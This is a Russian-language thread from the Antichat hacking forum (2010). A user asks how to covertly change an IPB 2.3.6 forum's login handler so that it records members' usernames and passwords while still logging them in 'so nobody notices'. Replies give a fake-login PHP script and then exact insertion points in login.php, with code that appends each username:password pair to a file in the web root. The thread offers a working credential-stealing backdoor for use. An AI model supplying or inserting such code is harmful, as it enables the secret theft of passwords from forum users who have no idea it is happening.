ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

ipb форма входа
  #1  
Старый 21.01.2010, 19:04
Аватар для {BuT@Min}
{BuT@Min}
Познающий
Регистрация: 23.11.2006
Сообщений: 48
Провел на форуме:
292461

Репутация: 10
Отправить сообщение для {BuT@Min} с помощью ICQ
По умолчанию ipb форма входа

Подскажите как к ipb 2.3.6 можно прикрутить к форме входа скрипт которы бы сохранял логин и пароль в отдельный файл,но при этом и заходил на форум.Если мона скрипт или ссылку на что нить подобное.Заранее благодарен за ответы.
 
Ответить с цитированием

  #2  
Старый 21.01.2010, 23:39
Аватар для DeepBlue7
DeepBlue7
Познающий
Регистрация: 02.01.2009
Сообщений: 90
Провел на форуме:
390073

Репутация: 44
По умолчанию

Просто замути фейк. В index.php измени скрипт, к которому будет обращатся форма входа например на exploit.php и пропиши туда

Код:
<?php
$login = $_POST['login'];
$pass = $_POST['pass'];
$fp = fopen('fadsa.php', 'a+');
fwrite($fp, "$login:$pass<br>");
fclose($fp);

header("Location: success.php");
?>
Тоесть $login, $pass пропишется в файл fadsa.php на веб сервере. После того как пользователь ввел логин и пароль он будет перенаправлен на success.php
 
Ответить с цитированием

  #3  
Старый 22.01.2010, 00:37
Аватар для {BuT@Min}
{BuT@Min}
Познающий
Регистрация: 23.11.2006
Сообщений: 48
Провел на форуме:
292461

Репутация: 10
Отправить сообщение для {BuT@Min} с помощью ICQ
По умолчанию

Цитата:
Сообщение от DeepBlue7  
Просто замути фейк. В index.php измени скрипт, к которому будет обращатся форма входа например на exploit.php и пропиши туда

Код:
<?php
$login = $_POST['login'];
$pass = $_POST['pass'];
$fp = fopen('fadsa.php', 'a+');
fwrite($fp, "$login:$pass<br>");
fclose($fp);

header("Location: success.php");
?>
Тоесть $login, $pass пропишется в файл fadsa.php на веб сервере. После того как пользователь ввел логин и пароль он будет перенаправлен на success.php
Да в том и дело что мне фейк не нужен а нужно чтобы форум фунционировая и никто ничего не замечал))) я когда то видел что то подобное под dle
 
Ответить с цитированием

  #4  
Старый 22.01.2010, 00:54
Аватар для olishort
olishort
Участник форума
Регистрация: 13.04.2009
Сообщений: 121
Провел на форуме:
436858

Репутация: 33
По умолчанию

Посмотри какие POST параметры передает скрипт, куда передает. Оттуда и копай
 
Ответить с цитированием

  #5  
Старый 22.01.2010, 02:04
Аватар для {BuT@Min}
{BuT@Min}
Познающий
Регистрация: 23.11.2006
Сообщений: 48
Провел на форуме:
292461

Репутация: 10
Отправить сообщение для {BuT@Min} с помощью ICQ
По умолчанию

мнеб конкретики я в php не силён *(
 
Ответить с цитированием

  #6  
Старый 22.01.2010, 15:35
Аватар для DeepBlue7
DeepBlue7
Познающий
Регистрация: 02.01.2009
Сообщений: 90
Провел на форуме:
390073

Репутация: 44
По умолчанию

Ну тогда просто тупо "Дописываеш"

Код:
<?php
$login = $_POST['login'];
$pass = $_POST['pass'];
$fp = fopen('fadsa.php', 'a+');
fwrite($fp, "$login:$pass<br>");
fclose($fp);

?>
в скрипт который реально обрабатывает данные. единственное отличие только в
Код:
$login = $_POST['login'];
$pass = $_POST['pass'];
В post надо прописать те же значения которые реально использует форум.

Последний раз редактировалось DeepBlue7; 23.01.2010 в 00:58..
 
Ответить с цитированием

  #7  
Старый 22.01.2010, 16:14
Аватар для {BuT@Min}
{BuT@Min}
Познающий
Регистрация: 23.11.2006
Сообщений: 48
Провел на форуме:
292461

Репутация: 10
Отправить сообщение для {BuT@Min} с помощью ICQ
По умолчанию

Цитата:
Сообщение от DeepBlue7  
Ну тогда просто тупо "Дописываеш"

<?php
$login = $_POST['login'];
$pass = $_POST['pass'];
$fp = fopen('fadsa.php', 'a+');
fwrite($fp, "$login:$pass<br>");
fclose($fp);

?>

в скрипт который реально обрабатывает данные. единственное отличие только в $login = $_POST['login'];
$pass = $_POST['pass'];

В post надо прописать те же значения которые реально использует форум.
Так всётаки понятней)))) Спасибо
 
Ответить с цитированием

  #8  
Старый 22.01.2010, 16:19
Аватар для DeepSy
DeepSy
Новичок
Регистрация: 17.01.2010
Сообщений: 18
Провел на форуме:
335210

Репутация: 4
По умолчанию

Цитата:
Сообщение от DeepBlue7  
Ну тогда просто тупо "Дописываеш"

<?php
$login = $_POST['login'];
$pass = $_POST['pass'];
$fp = fopen('fadsa.php', 'a+');
fwrite($fp, "$login:$pass<br>");
fclose($fp);

?>

в скрипт который реально обрабатывает данные. единственное отличие только в $login = $_POST['login'];
$pass = $_POST['pass'];

В post надо прописать те же значения которые реально использует форум.
Значения все?
а то чо то не получается(
 
Ответить с цитированием

  #9  
Старый 22.01.2010, 20:48
Аватар для {BuT@Min}
{BuT@Min}
Познающий
Регистрация: 23.11.2006
Сообщений: 48
Провел на форуме:
292461

Репутация: 10
Отправить сообщение для {BuT@Min} с помощью ICQ
По умолчанию

Цитата:
Сообщение от DeepSy  
Значения все?
а то чо то не получается(
Открываеш sources\action_public там файл login.php

Находиш
PHP код:
username strtolower(str_replace'|''|'$this->ipsclass->input['UserName']) ); 
Ниже вставляеш

PHP код:
          $login $_POST['UserName']; 
потом ищеш
PHP код:
$this->han_login->login_authenticate$username$this->ipsclass->input['PassWord'] ); 
ниже вставляеш

PHP код:
$pass $_POST['PassWord'];
            
$fp fopen('ИМЯ_ФАЙЛА.php''a+');
            
fwrite($fp"$login:$pass<br>");
            
fclose($fp); 
всё.
ИМЯ ФАЙЛА надо изменит на тот который у тебя,в корневой деректории
 
Ответить с цитированием

  #10  
Старый 23.01.2010, 00:58
Аватар для DeepBlue7
DeepBlue7
Познающий
Регистрация: 02.01.2009
Сообщений: 90
Провел на форуме:
390073

Репутация: 44
По умолчанию

Ну на конец то доперли. Наверн можно тему закрывать ))
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Форма входа и регистрации selevit PHP, PERL, MySQL, JavaScript 7 22.08.2009 04:59
IPB vs vBulletin.... Zinus PHP, PERL, MySQL, JavaScript 50 18.01.2009 20:35
скрипт распознавания форума genom-- Форумы 22 31.12.2008 15:06
Возвожно ли защитить форум IPB 2.0.4 Trial или IPB 1.3 final от взлома эксплоитом? CTTAPTAK Форумы 1 10.10.2005 21:46



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ